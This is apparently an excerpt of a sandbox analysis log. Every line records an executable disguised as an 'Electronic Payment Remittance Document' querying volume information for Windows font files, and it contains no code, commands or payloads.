          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
